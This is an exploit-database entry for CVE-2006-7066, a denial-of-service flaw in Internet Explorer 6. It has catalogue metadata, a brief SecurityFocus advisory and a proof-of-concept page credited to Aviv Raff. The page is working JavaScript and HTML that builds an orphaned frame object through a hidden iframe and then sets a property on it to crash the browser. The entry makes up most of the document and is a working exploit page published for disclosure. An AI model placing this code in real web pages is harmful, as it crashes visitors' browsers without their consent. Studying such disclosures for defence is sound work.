Microsoft Internet Explorer 6 - Deleted Frame Object Denial of Service

Author: hdm
type: dos
platform: windows
port: 
date_added: 2006-07-29 
date_updated: 2013-09-15 
verified: 1 
codes: CVE-2006-7066;OSVDB-27533 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/19228/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability. This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

// MoBB Demo
			// Provided by Aviv Raff
			// http://aviv.raffon.net/

            var orphanObject;

            function createOrphanObject() {
                orphanObject=document.frames["emptyFrame"].document.getElementById("emptyObject").object.parentWindow.document.createElement("frame");
                document.frames["emptyFrame"].location.href="about:blank";
                window.setTimeout('crashBrowser()',1);
            }

            function crashBrowser() {
                orphanObject.frameBorder="whateveryoulike";
            }

            function insertEmptyObject() {
                return '<OBJECT id="emptyObject" data="nonexist.html" type="text/html"></OBJECT>';
            }


        <iframe id="emptyFrame" src="javascript:parent.insertEmptyObject()" style="display:none"></iframe>

        Clicking the button below may crash your browser!<br><br>
        <input type='button' onClick='createOrphanObject()' value='Start Demo!'>